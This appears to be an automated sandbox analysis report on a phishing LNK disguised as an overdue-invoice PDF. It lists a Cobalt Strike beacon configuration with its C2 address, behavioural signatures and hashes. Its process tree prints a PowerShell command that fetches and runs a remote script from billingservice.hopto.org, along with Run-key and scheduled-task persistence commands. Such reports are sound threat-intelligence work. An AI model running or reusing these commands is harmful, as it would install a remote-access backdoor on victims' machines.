Analysis
-
max time kernel
146s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system -
submitted
06-02-2023 16:45
Static task
static1
Behavioral task
behavioral1
Sample
Overdue_Invoice_2023B.pdf.lnk
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
Overdue_Invoice_2023B.pdf.lnk
Resource
win10v2004-20221111-en
General
-
Target
Overdue_Invoice_2023B.pdf.lnk
-
Size
1KB
-
MD5
094815ab6988cda2101381cbeeb0056e
-
SHA1
df5f22ce9d8e0ee3ebca101f5112c6456088d317
-
SHA256
0135c4f45de3e2187708033da3135210b03c9db4275dfa794dbcbff21b4f4df9
-
SHA512
c8f3aae210a0157275c0f24e9175ef9d508c55fd5c8e48e6c10e95a79a9f41927d5574dc5197c9594f6fbfefe3eb19f851570c6bb5e0eaecd6311731e26e4363
Malware Config
Extracted
cobaltstrike
987654321
http://185.225.74.52:443/favicon.js
-
access_type
512
-
beacon_type
2048
-
host
185.225.74.52,/favicon.js
-
http_header1
AAAAEAAAABpIb3N0OiBidXNpbmVzc3NlcnZpY2VzLmNvbQAAAAoAAAARQ29ubmVjdGlvbjogY2xvc2UAAAAKAAAAE0FjY2VwdC1FbmNvZGluZzogYnIAAAAKAAAAFkFjY2VwdC1MYW5ndWFnZTogZW4tVVMAAAAHAAAAAAAAAA0AAAADAAAAAgAAABp3b29jb21tZXJjZV9pdGVtc19pbl9jYXJ0PQAAAAYAAAAGQ29va2llAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
-
http_header2
AAAAEAAAABpIb3N0OiBidXNpbmVzc3NlcnZpY2VzLmNvbQAAAAoAAAARQ29ubmVjdGlvbjogY2xvc2UAAAAKAAAAGUFjY2VwdC1FbmNvZGluZzogZ3ppcCwgYnIAAAAKAAAAL0NvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkAAAABwAAAAEAAAANAAAAAwAAAAIAAAAIZGV0YWlscz0AAAAEAAAABwAAAAAAAAADAAAAAgAAAA5fX3Nlc3Npb25fX2lkPQAAAAYAAAAGQ29va2llAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
-
http_method1
GET
-
http_method2
POST
-
jitter
9472
-
polling_time
55991
-
port_number
443
-
sc_process32
%windir%\syswow64\dllhost.exe
-
sc_process64
%windir%\sysnative\dllhost.exe
-
state_machine
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCMEuNG3asVOp+bgSmSog10bB55R9e+aj5dF2sVbnRjA/dTkltRdDD0DdF5vJh/gURBikZ4FxqqmfqR2SPAheOzDDrYvV7ScpwPkZe8IUd/DbJmPs30ST9SGHn+eLjTQQEU+I142t7yTsO7HCKf1CTDMHfS3PNoz3V8ivNRwL1aiQIDAQABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
-
unknown1
9.63976192e+08
-
unknown2
AAAABAAAAAIAAANxAAAAAwAAAA0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
-
uri
/btn_bg
-
user_agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/42.0.2311.135
-
watermark
987654321
Signatures
-
Cobaltstrike
Detected malicious payload which is part of Cobaltstrike.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
Processes:
RuntimeBroker.exedescription pid process target process PID 4988 created 740 4988 RuntimeBroker.exe Explorer.EXE PID 4988 created 740 4988 RuntimeBroker.exe Explorer.EXE -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exepowershell.exeflow pid process 12 2260 powershell.exe 15 2008 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation cmd.exe -
Executes dropped EXE 1 IoCs
Processes:
RuntimeBroker.exepid process 4988 RuntimeBroker.exe -
Loads dropped DLL 1 IoCs
Processes:
RuntimeBroker.exepid process 4988 RuntimeBroker.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MicrosoftLibrary = "powershell.exe -noP -sta -w 1 Set-Location -Path $env:Public\\Libraries\\MicrosoftLibrary; Start-Process $env:Public\\Libraries\\MicrosoftLibrary\\RuntimeBroker.exe\"" reg.exe Key created \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Software\Microsoft\Windows\CurrentVersion\Run reg.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
AcroRd32.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz AcroRd32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 AcroRd32.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Processes:
AcroRd32.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION AcroRd32.exe -
Modifies registry class 1 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000_Classes\Local Settings powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 26 IoCs
Processes:
powershell.exepowershell.exeRuntimeBroker.exeAcroRd32.exepid process 2260 powershell.exe 2260 powershell.exe 2008 powershell.exe 2008 powershell.exe 4988 RuntimeBroker.exe 4988 RuntimeBroker.exe 4168 AcroRd32.exe 4168 AcroRd32.exe 4168 AcroRd32.exe 4168 AcroRd32.exe 4168 AcroRd32.exe 4168 AcroRd32.exe 4168 AcroRd32.exe 4168 AcroRd32.exe 4168 AcroRd32.exe 4168 AcroRd32.exe 4168 AcroRd32.exe 4168 AcroRd32.exe 4168 AcroRd32.exe 4168 AcroRd32.exe 4168 AcroRd32.exe 4168 AcroRd32.exe 4168 AcroRd32.exe 4168 AcroRd32.exe 4168 AcroRd32.exe 4168 AcroRd32.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs
Processes:
RuntimeBroker.exepid process 4988 RuntimeBroker.exe 4988 RuntimeBroker.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2260 powershell.exe Token: SeDebugPrivilege 2008 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
AcroRd32.exepid process 4168 AcroRd32.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
Processes:
AcroRd32.exepid process 4168 AcroRd32.exe 4168 AcroRd32.exe 4168 AcroRd32.exe 4168 AcroRd32.exe 4168 AcroRd32.exe 4168 AcroRd32.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exepowershell.exepowershell.exeAcroRd32.exeRdrCEF.exedescription pid process target process PID 4736 wrote to memory of 2260 4736 cmd.exe powershell.exe PID 4736 wrote to memory of 2260 4736 cmd.exe powershell.exe PID 4736 wrote to memory of 2260 4736 cmd.exe powershell.exe PID 2260 wrote to memory of 2008 2260 powershell.exe powershell.exe PID 2260 wrote to memory of 2008 2260 powershell.exe powershell.exe PID 2260 wrote to memory of 2008 2260 powershell.exe powershell.exe PID 2008 wrote to memory of 4168 2008 powershell.exe AcroRd32.exe PID 2008 wrote to memory of 4168 2008 powershell.exe AcroRd32.exe PID 2008 wrote to memory of 4168 2008 powershell.exe AcroRd32.exe PID 2008 wrote to memory of 5008 2008 powershell.exe attrib.exe PID 2008 wrote to memory of 5008 2008 powershell.exe attrib.exe PID 2008 wrote to memory of 5008 2008 powershell.exe attrib.exe PID 4168 wrote to memory of 2280 4168 AcroRd32.exe RdrCEF.exe PID 4168 wrote to memory of 2280 4168 AcroRd32.exe RdrCEF.exe PID 4168 wrote to memory of 2280 4168 AcroRd32.exe RdrCEF.exe PID 2008 wrote to memory of 4988 2008 powershell.exe RuntimeBroker.exe PID 2008 wrote to memory of 4988 2008 powershell.exe RuntimeBroker.exe PID 2280 wrote to memory of 4088 2280 RdrCEF.exe RdrCEF.exe PID 2280 wrote to memory of 4088 2280 RdrCEF.exe RdrCEF.exe PID 2280 wrote to memory of 4088 2280 RdrCEF.exe RdrCEF.exe PID 2280 wrote to memory of 4088 2280 RdrCEF.exe RdrCEF.exe PID 2280 wrote to memory of 4088 2280 RdrCEF.exe RdrCEF.exe PID 2280 wrote to memory of 4088 2280 RdrCEF.exe RdrCEF.exe PID 2280 wrote to memory of 4088 2280 RdrCEF.exe RdrCEF.exe PID 2280 wrote to memory of 4088 2280 RdrCEF.exe RdrCEF.exe PID 2280 wrote to memory of 4088 2280 RdrCEF.exe RdrCEF.exe PID 2280 wrote to memory of 4088 2280 RdrCEF.exe RdrCEF.exe PID 2280 wrote to memory of 4088 2280 RdrCEF.exe RdrCEF.exe PID 2280 wrote to memory of 4088 2280 RdrCEF.exe RdrCEF.exe PID 2280 wrote to memory of 4088 2280 RdrCEF.exe RdrCEF.exe PID 2280 wrote to memory of 4088 2280 RdrCEF.exe RdrCEF.exe PID 2280 wrote to memory of 4088 2280 RdrCEF.exe RdrCEF.exe PID 2280 wrote to memory of 4088 2280 RdrCEF.exe RdrCEF.exe PID 2280 wrote to memory of 4088 2280 RdrCEF.exe RdrCEF.exe PID 2280 wrote to memory of 4088 2280 RdrCEF.exe RdrCEF.exe PID 2280 wrote to memory of 4088 2280 RdrCEF.exe RdrCEF.exe PID 2280 wrote to memory of 4088 2280 RdrCEF.exe RdrCEF.exe PID 2280 wrote to memory of 4088 2280 RdrCEF.exe RdrCEF.exe PID 2280 wrote to memory of 4088 2280 RdrCEF.exe RdrCEF.exe PID 2280 wrote to memory of 4088 2280 RdrCEF.exe RdrCEF.exe PID 2280 wrote to memory of 4088 2280 RdrCEF.exe RdrCEF.exe PID 2280 wrote to memory of 4088 2280 RdrCEF.exe RdrCEF.exe PID 2280 wrote to memory of 4088 2280 RdrCEF.exe RdrCEF.exe PID 2280 wrote to memory of 4088 2280 RdrCEF.exe RdrCEF.exe PID 2280 wrote to memory of 4088 2280 RdrCEF.exe RdrCEF.exe PID 2280 wrote to memory of 4088 2280 RdrCEF.exe RdrCEF.exe PID 2280 wrote to memory of 4088 2280 RdrCEF.exe RdrCEF.exe PID 2280 wrote to memory of 4088 2280 RdrCEF.exe RdrCEF.exe PID 2280 wrote to memory of 4088 2280 RdrCEF.exe RdrCEF.exe PID 2280 wrote to memory of 4088 2280 RdrCEF.exe RdrCEF.exe PID 2280 wrote to memory of 4088 2280 RdrCEF.exe RdrCEF.exe PID 2280 wrote to memory of 4088 2280 RdrCEF.exe RdrCEF.exe PID 2280 wrote to memory of 4088 2280 RdrCEF.exe RdrCEF.exe PID 2280 wrote to memory of 4088 2280 RdrCEF.exe RdrCEF.exe PID 2280 wrote to memory of 4088 2280 RdrCEF.exe RdrCEF.exe PID 2280 wrote to memory of 4088 2280 RdrCEF.exe RdrCEF.exe PID 2280 wrote to memory of 4088 2280 RdrCEF.exe RdrCEF.exe PID 2280 wrote to memory of 4088 2280 RdrCEF.exe RdrCEF.exe PID 2280 wrote to memory of 3372 2280 RdrCEF.exe RdrCEF.exe PID 2280 wrote to memory of 3372 2280 RdrCEF.exe RdrCEF.exe PID 2280 wrote to memory of 3372 2280 RdrCEF.exe RdrCEF.exe PID 2280 wrote to memory of 3372 2280 RdrCEF.exe RdrCEF.exe PID 2280 wrote to memory of 3372 2280 RdrCEF.exe RdrCEF.exe PID 2280 wrote to memory of 3372 2280 RdrCEF.exe RdrCEF.exe -
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\Overdue_Invoice_2023B.pdf.lnk2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noP -sta -w 1 Invoke-WebRequest 'http://billingservice.hopto.org/UY7G6S/s4Nt4.txt' -UseBasicParsing | Select-Object -Expand Content | powershell3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"4⤵
- Blocklisted process makes network request
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\Downloads\Invoice.pdf"5⤵
- Checks processor information in registry
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=165140436⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=CCC5E39B1935A27074417C7D391DD486 --mojo-platform-channel-handle=1744 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:27⤵
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=EC913024932E32653059E9D83EBE4273 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=EC913024932E32653059E9D83EBE4273 --renderer-client-id=2 --mojo-platform-channel-handle=1812 --allow-no-sandbox-job /prefetch:17⤵
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=20364CE6D8CD753AAAE46B895A2D238B --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=20364CE6D8CD753AAAE46B895A2D238B --renderer-client-id=4 --mojo-platform-channel-handle=2176 --allow-no-sandbox-job /prefetch:17⤵
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=B8A79CB2EFA05472B7D094E20F5E8781 --mojo-platform-channel-handle=2552 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:27⤵
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=633CA2CFECBD2A73770EE4E093EC7F0C --mojo-platform-channel-handle=2852 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:27⤵
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=C13F44CDE3889523BCB76F1188528526 --mojo-platform-channel-handle=2920 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:27⤵
-
C:\Windows\SysWOW64\attrib.exe"C:\Windows\system32\attrib.exe" +h C:\Users\Admin\AppData\Local\Temp\dae3a0e8-6da7-4323-b0a1-7443d70eb8b15⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\dae3a0e8-6da7-4323-b0a1-7443d70eb8b1\RuntimeBroker.exe"C:\Users\Admin\AppData\Local\Temp\dae3a0e8-6da7-4323-b0a1-7443d70eb8b1\RuntimeBroker.exe"5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
-
C:\Windows\System32\cmd.exe/C reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v MicrosoftLibrary /t REG_SZ /d "powershell.exe -noP -sta -w 1 Set-Location -Path $env:Public\Libraries\MicrosoftLibrary; Start-Process $env:Public\Libraries\MicrosoftLibrary\RuntimeBroker.exe"" /f6⤵
-
C:\Windows\system32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v MicrosoftLibrary /t REG_SZ /d "powershell.exe -noP -sta -w 1 Set-Location -Path $env:Public\Libraries\MicrosoftLibrary; Start-Process $env:Public\Libraries\MicrosoftLibrary\RuntimeBroker.exe"" /f7⤵
- Adds Run key to start application
- Modifies registry key
-
C:\Windows\System32\schtasks.exe/F /Create /TN Microsoft_Library /sc minute /MO 80 /TR "powershell.exe -WindowStyle hidden -noP -sta -w 1 Set-Location -Path $env:Public\Libraries\MicrosoftLibrary; Start-Process $env:Public\Libraries\MicrosoftLibrary\RuntimeBroker.exe6⤵
- Creates scheduled task(s)
-
C:\windows\system32\wermgr.exe"C:\windows\system32\wermgr.exe"2⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logFilesize
2KB
MD5f26d40f3fe3b07202462281e3520a8a5
SHA138c528ce4457b2bb1fd9aa18597275e4ca6492ef
SHA256a556110b4c51077cba0f523c08060bb41b3380751311f47f3da03de9cf20bf84
SHA5122a9af331837bc09e21f06aab4b6ad2a532defd5e0719fe42ea73e5cd44e6262eb2f8df46c07b843d46d457737eceec716829f3a3f7a5fa94282f420ddaed5de4
-
C:\Users\Admin\AppData\Local\Temp\dae3a0e8-6da7-4323-b0a1-7443d70eb8b1\RuntimeBroker.exeFilesize
100KB
MD5ba4cfe6461afa1004c52f19c8f2169dc
SHA1ab8539ef6b2a93ff9589dec4b34a0257b6296c92
SHA256e86870769ee6c797e09457bd99c58d9bf2303cf0193a24ef9b1222c2c3daf628
SHA5122c5190d7609767237311260f241c619b82434ca640f396bb9710d356286844f82f320f9e05525a38707f2a52977790c0c3e2a217b36a7f0095a87c138b939af0
-
C:\Users\Admin\AppData\Local\Temp\dae3a0e8-6da7-4323-b0a1-7443d70eb8b1\RuntimeBroker.exeFilesize
100KB
MD5ba4cfe6461afa1004c52f19c8f2169dc
SHA1ab8539ef6b2a93ff9589dec4b34a0257b6296c92
SHA256e86870769ee6c797e09457bd99c58d9bf2303cf0193a24ef9b1222c2c3daf628
SHA5122c5190d7609767237311260f241c619b82434ca640f396bb9710d356286844f82f320f9e05525a38707f2a52977790c0c3e2a217b36a7f0095a87c138b939af0
-
C:\Users\Admin\AppData\Local\Temp\dae3a0e8-6da7-4323-b0a1-7443d70eb8b1\UMPDC.dllFilesize
391KB
MD51570c92c1c5f039c438295ac68ff7e82
SHA13ee6c1d3582361e8af4efec44b1d1420494ab728
SHA256b41b4e32607a4e21593332da63ce1bcf9c1d43f8f6754789a43bea7428833ea4
